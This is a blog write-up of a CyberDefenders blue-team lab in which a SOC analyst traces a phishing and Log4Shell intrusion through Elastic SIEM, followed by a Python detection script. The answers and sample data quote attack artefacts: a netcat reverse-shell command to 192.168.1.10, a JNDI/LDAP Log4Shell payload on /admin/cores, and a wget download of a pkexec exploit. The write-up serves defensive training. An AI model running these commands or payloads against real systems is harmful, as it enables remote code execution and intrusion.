
CyberDefender Elastic-Case

CyberDefenders is a platform used for blue-team training. The Elastic-Case lab, now expired, shows how a Log4Shell exploit can be seen through the Elastic SIEM. This vulnerability has been public for a few years now, but it is still being exploited in the wild. On December 11, 2023, BleepingComputer reported that the Lazarus group had released a new RAT using this exploit. BleepingComputer also wrote that roughly 38% of applications using the Apache Log4j library are running a vulnerable version.

Scenario:

An attacker was able to trick an employee into downloading a suspicious file and running it. The attacker compromised the system; along with that, the Security Team did not update most systems. The attacker was able to pivot to another system and compromise the company. As a SOC analyst, you are assigned to investigate the incident using Elastic as a SIEM tool and help the team kick out the attacker.

What is Log4j and Log4Shell?

  • Log4j is a Java-based logging utility. Log4Shell (CVE-2021-44228) is a vulnerability in Log4j which allowed remote code execution.

IBM Log4Shell Explanation

1. Who downloads the malicious file which has a double extension?

For this problem, I checked the Alerts tab of the security section in Kibana. I filtered by the “Malware Detection Alert” rule and found ahmed to be the user that downloaded the malicious file.

2. What is the hostname he was using?

Clicking view details on the initial download alert, DESKTOP-Q1SL9P2 is the hostname that was used.

3. What is the name of the malicious file?

The malicious file name, as shown in the details section, is ‘Acount_details.pdf.exe’.

4. What is the attacker’s IP address?

Using the Analyze Event feature in Kibana, the 11 network events for ‘Acount_details.pdf.exe’ show that the IP address is 192.168.1.10.

5. Another user with high privilege runs the same malicious file. What is the username?

Returning to the Alerts tab, it is shown that the other user to run the malicious file is cybery.

6. The attacker was able to upload a DLL file of size 8704. What is the file name?

Given the provided details, a query can be used to find the file: ‘file.extension: "dll" and file.size: 8704’. This results in two alerts showing the mCblHDgWP.dll file.

7. What parent process name spawns cmd with NT AUTHORITY privilege and pid 10716?

Using the Analyze Event feature on the .dll file, a process “rundll32.exe” is shown spawning two cmd processes, one of which is the cmd with NT AUTHORITY privilege and pid 10716.

8. The previous process was able to access a registry. What is the full path of the registry?

Selecting the registry section of the rundll32.exe process shows the full path to be HKLM\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled.

9. PowerShell process with pid 8836 changed a file in the system. What was that filename?

While analyzing the event, checking the file activity for powershell.exe shows that there was a file change to ‘ModuleAnalysisCache’.

10. PowerShell process with pid 11676 created files with the ps1 extension. What is the file that has been created?

Looking at the other PowerShell process, it shows the file created was __PSScriptPolicyTest_bymwxuft.3b5.ps1.

11. What is the IP address of the machine that is in the same LAN as the Windows machine?

The query ‘host.ip: 192.168.10.0/24’ shows the other machine to be an Ubuntu host, with the IP address 192.168.10.30.

12. The attacker logged in to the Ubuntu machine after a brute-force attack. What username did he successfully log in with?

Looking at the host authentications in the security section, there are signs of a brute-force attack, with 94 successful authentications and 520 failed. The account that was successfully brute-forced was salem.

13. After that, the attacker downloaded the exploit from a GitHub repo using wget. What is the full URL of the repo?

Using the query ‘process.args: "wget" and user.name: "salem"’ shows the URL to be https://raw.githubusercontent.com/joeammond/CVE-2021-4034/main/CVE-2021-4034.py.

14. After the attacker runs the exploit, which spawns a new process called pkexec, what is the process’s md5 hash?

3a4ad518e9e404a6bad3d39dfebaf2f6

15. Then the attacker gets an interactive shell by running a specific command on process id 3011 as the root user. What is the command?

bash -i

16. What is the hostname with the alert signal.rule.name: “Netcat Network Activity”?

CentOS

17. What is the username who ran netcat?

solr

18. What is the parent process name of netcat?

java

19. If you focus on the nc process, you can get the entire command that the attacker ran to get a reverse shell. What is the full command?

nc -e /bin/bash 192.168.1.10 9999

20. From the previous three questions, you may remember a famous java vulnerability. What is it?

A quick search shows the vulnerability is Log4Shell.

21. What is the entire log file path of the “solr” application?

/var/solr/logs/solr.log

22. What is the path that is vulnerable to log4j?

/admin/cores

23. What is the GET request parameter used to deliver log4j payload?

foo

24. What is the JNDI payload that is connected to the LDAP port?

{foo=${jndi:ldap://192.168.1.10:1389/Exploit}}
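The two signals behind questions 17-19 and 22-24 (a Java parent spawning netcat with -e, and a JNDI lookup in a Solr request parameter) can be checked with a few lines of detection logic. The following is an added example, not code from the lab or from CyberDefenders; the solr.log line and the process event are constructed samples modelled on the answers above, and the Solr log layout (`path=... params={...} status=...`) is assumed.

```python
import re

# Request fields as Solr writes them to solr.log: the path and the {param=value&...} block.
SOLR_REQ_RE = re.compile(r"path=(?P<path>\S+)\s+params=\{(?P<params>.*?)\}\s+status=")
# A JNDI lookup string, case-insensitive, capturing the scheme and the host:port it reaches out to.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]+)(?::(?P<port>\d+))?", re.I)

def find_jndi_lookups(log_line):
    """One finding per request parameter whose value carries a JNDI lookup (Q22-24)."""
    req = SOLR_REQ_RE.search(log_line)
    if not req:
        return []
    findings = []
    for pair in req["params"].split("&"):
        name, _, value = pair.partition("=")
        m = JNDI_RE.search(value)
        if m:
            findings.append({"path": req["path"], "param": name, "scheme": m["scheme"].lower(),
                             "host": m["host"], "port": int(m["port"]) if m["port"] else None})
    return findings

def flag_java_spawned_netcat(event):
    """Return the connect-back target when a Java parent launches nc with -e (Q17-19), else None."""
    if event.get("process.name") not in ("nc", "ncat", "netcat") or event.get("process.parent.name") != "java":
        return None
    args = event.get("process.args", [])
    if "-e" not in args:
        return None
    i = args.index("-e")
    if len(args) < i + 4:  # need the program after -e, then a host and a port
        return None
    # In the command seen in the lab the remote address and port are the last two arguments.
    return {"host": event.get("host.name"), "user": event.get("user.name"),
            "shell": args[i + 1], "remote": f"{args[-2]}:{args[-1]}"}

# Constructed sample data modelled on the lab's answers (not copied from the lab dataset).
SAMPLE_LOG = ("2021-12-13 10:21:32.101 INFO  (qtp1234-18) [   ] o.a.s.s.HttpSolrCall [admin] "
              "webapp=null path=/admin/cores params={foo=${jndi:ldap://192.168.1.10:1389/Exploit}} "
              "status=0 QTime=3")
SAMPLE_EVENT = {"host.name": "CentOS", "user.name": "solr", "process.parent.name": "java",
                "process.name": "nc", "process.args": ["nc", "-e", "/bin/bash", "192.168.1.10", "9999"]}

if __name__ == "__main__":
    for f in find_jndi_lookups(SAMPLE_LOG):
        print(f"JNDI lookup via {f['param']} on {f['path']} -> {f['scheme']}://{f['host']}:{f['port']}")
    print(flag_java_spawned_netcat(SAMPLE_EVENT))
```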

This post is licensed under CC BY 4.0 by the author.